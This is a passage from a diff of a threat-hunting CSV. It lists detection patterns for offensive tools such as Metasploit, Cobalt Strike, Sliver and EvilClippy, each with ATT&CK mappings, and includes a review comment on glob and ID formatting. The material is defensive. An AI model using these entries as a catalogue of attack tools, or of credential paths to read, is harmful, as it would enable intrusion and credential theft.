and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_snmp.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/enum_f5.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_juniper.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_proxy.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_services.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_shares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_snmp.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/EnumCLR.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/enumerate.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/enumerate/enumerate.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" 
@@ -3503,7 +3516,7 @@ "*/Erebus/*.dll*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus/*.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus-email.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*/etc/passwd*/.sudo_as_admin_successful*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/etc/passwd*/.sudo_as_admin_successful*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*/EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*/EternalHushFramework.git*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*/etumbot.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" 
@@ -3513,10 +3526,10 @@ "*/etw-fuck.cpp*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/etw-fuck.exe*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/ETWHash/*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" -"*/evasion/evasion.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/evasion/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/evasion_linux.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/evasion_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/evasion/evasion.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/evasion/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/evasion_linux.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/evasion_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" 
"*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 
- T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*/EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" 
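Review bot: The re-emitted sliver row keeps the keyword `"*/evasion/evasion.go"` with no trailing `*`, unlike its siblings `"*/evasion_linux.go*"` and `"*/evasion_windows.go*"` in this hunk. If consumers treat `*` as a glob, that entry matches only strings ending in the path, so a URL with a query string or a command line with further arguments would presumably slip past both the endpoint and proxy detections it is enabled for. Writing it as `"*/evasion/evasion.go*"` would align it with the other rows. The same sliver rows write sub-techniques as `T1573-001`, where the cobaltstrike rows use the dotted `T1548.002` form, so any ATT&CK lookup on this column will not resolve them. The gophish and mythic rows in the next hunk share this, and normalising to `T1573.001` style while the rows are being regenerated would fix it.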
@@ -3526,18 +3539,18 @@ "*/EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" "*/EvilClippy.git*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" -"*/evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*/evilhost:*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
